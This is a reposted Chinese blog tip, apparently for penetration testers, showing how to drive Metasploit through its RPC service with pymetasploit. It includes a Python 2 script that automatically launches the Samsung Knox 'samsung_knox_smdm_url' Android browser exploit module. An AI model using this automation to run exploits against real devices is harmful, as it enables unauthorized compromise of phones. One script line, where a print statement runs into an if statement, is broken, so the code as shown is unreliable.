加入收藏 | 设为首页 | 会员中心 | 我要投稿 安卓应用网 (https://www.0791zz.com/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 编程开发 > Python > 正文

分享一个metasploit快速测试脚本的TIPS

发布时间:2020-05-28 23:39:00 所属栏目:Python 来源:互联网
导读:分享一个metasploit快速测试脚本的TIPS

下面是脚本之家 jb51.cc 通过网络收集整理的代码片段。

脚本之家小编现在分享给大家,也给大家做个参考。

相信用过metasploit的同学都很苦逼,msfconsole漫长的启动时间,如果测试中敲错命令,或不小心退出后又重启任务,会让你直接抓狂。之前不想重复敲命令,看了下metasploit的开发文档,发现要自动化有各种方案,个人感觉最方便的是调用RPC接口,GITHUB上搜了把,发现有大拿封装好了模块,直接调用即可:
1.安装pymetasploit模块 git clonehttps://github.com/allfro/pymetasploit 切到目录 sudo python setup.py install
2.启动metasploit的RPC服务 msfrpcd -P test -n -f -a 127.0.0.1 这个test是rpc服务的密码,用户名默认是msf
3.定制自己的测试脚本 我这里定制的是测试三星knox漏洞的脚本,思路是每次启动先把之前运行的job和console停掉,然后自动创建一个console自动敲入命令进行新的漏洞测试,直接crtl-c结束脚本再重新测试都是一个新的job,而且每次测试都是秒开,不用再重启msfconsole了。中间各种接口怎么用,推荐大家再翻下官方的文档。
from metasploit.msfrpc import MsfRpcClient
import time
client = MsfRpcClient('test')
jobs = client.call('job.list')
for num in jobs.keys():
    if jobs[num].find('samsung_knox_smdm_url')>0:
        client.call('job.stop',num)
        
console = client.call('console.list')
for _console in console['consoles']:
    if _console.has_key('prompt'):
        if _console['prompt'].find('samsung_knox_smdm_url')>0:
            client.call('console.destroy',_console['id'])
              
cmd='''
use exploit/android/browser/samsung_knox_smdm_url
set LHOST 127.0.0.1
exploit
'''
res = client.call('console.create')
console_id = res['id']
client.call('console.write',console_id,cmd) 
try:
    while True:
        res = client.call('console.read',console_id)
        if len(res['data']) > 1:
                print res['data'],if res['busy'] == True:
                time.sleep(1)
                continue
except:
    pass

来自:http://weibo.com/p/1001603795720149837992

以上是脚本之家(jb51.cc)为你收集整理的全部代码内容,希望文章能够帮你解决所遇到的程序开发问题。

如果觉得脚本之家网站内容还不错,欢迎将脚本之家网站推荐给程序员好友。

(编辑:安卓应用网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

    推荐文章
      热点阅读